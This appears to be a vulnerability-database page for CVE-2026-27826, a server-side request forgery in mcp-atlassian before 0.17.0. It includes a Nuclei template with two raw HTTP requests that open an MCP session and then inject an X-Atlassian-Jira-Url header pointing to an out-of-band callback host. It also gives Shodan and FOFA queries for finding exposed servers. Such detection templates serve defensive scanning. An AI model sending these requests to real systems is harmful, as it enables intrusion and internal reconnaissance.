mcp-atlassian < 0.17.0 - Server-Side Request Forgery
CVE-2026-27826
Verified
Description
MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
Severity
High
CVSS Score
8.2
Exploit Probability
14%
Affected Product
mcp-atlassian
Published Date
April 16, 2026
Template Author
eyangfeng88-arch
CVE-2026-27826.yaml
id: CVE-2026-27826
info:
name: mcp-atlassian < 0.17.0 - Server-Side Request Forgery
author: eyangfeng88-arch
severity: high
description: |
MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint.
impact: |
Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft.
remediation: |
Upgrade to version 0.17.0 or later.
reference:
- https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/
- https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
- https://github.com/sooperset/mcp-atlassian/pull/986
- https://nvd.nist.gov/vuln/detail/CVE-2026-27826
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2026-27826
epss-score: 0.13589
epss-percentile: 0.96007
cwe-id: CWE-918
metadata:
verified: true
max-request: 2
vendor: sooperset
product: mcp-atlassian
shodan-query: http.html:"Atlassian MCP"
fofa-query: body="Atlassian MCP" || header="mcp-session-id"
tags: cve,cve2026,mcp,atlassian,ssrf,oast
flow: http(1) && http(2)
http:
- raw:
- |
POST /mcp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json, text/event-stream
{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}}
extractors:
- type: regex
name: session_id
part: header
internal: true
group: 1
regex:
- '(?i)Mcp-Session-Id:\s*([a-f0-9]+)'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'len(session_id) > 0'
condition: and
internal: true
- raw:
- |
POST /mcp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json, text/event-stream
Mcp-Session-Id: {{session_id}}
X-Atlassian-Jira-Url: http://{{interactsh-url}}
X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test
{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502207130cad296d2fdf04c9ffc143da7935f983691c2030509099138f2991c36ba75022100bf24765ca1801a7d8137a79cf4d283bc89a3bd726204daf91d97f5c51e68ce0a:922c64590222798bb761d5b6d8e729508.2Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
CVE ID:
cve-2026-27826
CWE ID:
cwe-918
Remediation Steps
Upgrade to version 0.17.0 or later.